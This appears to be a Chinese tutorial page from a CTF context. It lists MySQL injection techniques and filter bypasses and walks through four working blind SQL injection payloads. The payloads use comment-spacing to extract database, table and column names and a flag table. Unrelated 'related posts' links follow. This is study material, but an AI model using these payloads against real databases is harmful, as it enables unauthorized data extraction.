2. 程式人生 > 實用技巧 >Mysql注入的常用方法和繞過

Mysql注入的常用方法和繞過

阿新 發佈:2020-07-16
  • 寬位元組注入
  • 基於約束的注入
  • 報錯注入
  • 時間盲注
  • bool盲注
  • order by的注入
  • INSERT、UPDATE、DELETE相關的注入
  • 堆疊注入
  • 二次注入
  • 檔案讀寫
  • 常用繞過
  • 萬能密碼

參考:CTF SQL注入

慣用思路(這裡的例子是之前做的一道mysql盲注題,題目過濾了很多符號,如:單引號、空格和逗號):
1、首先通過database()函式得到庫名,或者去information_schema.schemata表查詢schema_name
"0/**/or/**/ascii(substring(database()/**/from/**/%d/**/for/**/1))=%d#" % (i, j)


2、然後去information_schema.tables表利用table_schema查詢table_name
"0/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
3、接著去information_schema.columns表利用table_name查詢column_name
"0/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d#" % (i, j)

4、最後select column_name from table_name 得到flag
"0/**/or/**/ascii(substr((select/**/*/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d#" % (i, j)

相關推薦

Mysql注入常用方法繞過

寬位元組注入 基於約束的注入 報錯注入 時間盲注 bool盲注 order by的注入 INSERT、UPDATE、DELETE相關的注入

Python os模組常用方法屬性總結

這篇文章主要介紹了Python os模組常用方法屬性總結,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

react引入圖片的常用方法遍歷迴圈圖片

一、react 引入站內圖片的兩種方式 : 1、通過import 引入圖片 import yesPic from \"../assets/images/yes.png\";

FormData常用方法在vue中的使用教程

技術標籤:javascriptvue.js 一 : 簡介 FormData 介面提供了一種表示表單資料的鍵值對 key/value 的構造方式,並且可以輕鬆的將資料通過前端Ajax 方法傳送出去,本介面方法都相當簡單直接。如果送出時的編碼

20201213_133_檔案物件常用方法屬性總結_seek()任意位置操作

技術標籤:學習筆記_Python程式設計基礎_Pycharm版 檔案物件的常用屬性和方法 檔案物件封裝了檔案相關的操作。在前面我們學習了通過檔案物件對檔案進行讀寫操作。本節中詳細列出檔案物件的常用屬性和方法,並進行

MySQL優化-常用方法

小型專案可能對資料庫要求沒有那麼大,但是對於百萬千萬級以上資料,查詢等資料庫便會有顯著下降,以下是個人專案中用到的方法(持續補充中...):

Java中各種資料結構的常用方法遍歷方式,用處

技術標籤:Java基礎資料結構佇列連結串列hashmapiterator List

substring常用方法lastIndexOf方法

技術標籤:java基礎 1、 substring常用的兩種方法 msg.substring(0,3):表示取前三個字元;

mysql 幾種啟動關閉mysql服務的方法區別

mysql幾種啟動方法 方法1、mysqld mysqld指定讀取my.cnf配置檔案啟動,加一個 & 實現後臺啟動。終端不會被阻塞

關於SQL注入的過濾繞過方式總結

過濾關鍵字:一般繞過方式:大小寫雙寫/**/,<>分割關鍵字編碼繞過過濾information_shcema:使用sys.x$schema_flattened_keys、sys.schema_table_statistics_with_buffer 、sys.schema_auto_increment_colum

SQL注入常用方法

聯合注入(union): ①判斷注入型別: 先判斷注入型別:字元型,數字型(注入 id=a 報錯表示 型別為數字 ,即就是$id,沒有””)

Mysql資料庫的QPSTPS的意義計算方法

在做db基準測試的時候,qps,tps 是衡量資料庫效能的關鍵指標。本文比較了網上的兩種計算方式。先來了解一下相關概念。

8種手動自動備份MySQL資料庫的方法

作為流行的開源資料庫管理系統,MySQL的使用者眾多,為了維護資料安全性,資料備份是必不可少的。本文就為大家介紹幾種適用於企業的資料備份方法

MySQL設定global變數session變數的兩種方法詳解

1、在MySQL中要修改全域性(global)變數,有兩種方法方法一,修改my.ini配置檔案,如果要設定全域性變數最簡單的方式是在my.ini檔案中直接寫入變數配置,如下圖所示。重啟資料庫服務就可以使全域性變數生效。

mysql全量備份快速恢復的方法整理

一個簡單的mysql全量備份指令碼,備份最近15天的資料。 備份 #每天備份mysql資料庫(儲存最近15天的資料指令碼)

C#常用方法——strng.Format()$用法詳解

String.Format 方法的幾種定義: String.Format (String,Object) 將指定的 String 中的格式項替換為指定的 Object 例項的值的文字等效項。String.Format (String,Object[]) 將指定 String 中的格式項替換為指定陣列中

解析ExceptionC#處理Exception的常用方法總結

在.NET中,異常是指成員沒有完成它的名稱宣稱可以完成的行動。在異常的機制中,異常某件事情的發生頻率無關。

Java中常用方法(Number&Math)

Java中常用和方法(Number&Math) 包裝類 在實際開發過程中,我們經常會遇到需要使用物件,而不是內建資料型別的情形。為了解決這個問題,Java 語言為每一個內建資料型別提供了對應的包裝類。

js中陣列字串的常用方法

陣列方法:pop() 、push() 、shift() 、unshift() 、 reverse() 、 sort() 、 splice() 會改變原陣列

Python 元組字典以及常用方法案例

Python 元組字典以及常用方法案例 元組 元組格式 變數名=(元素1,元素2…) 元組資料提取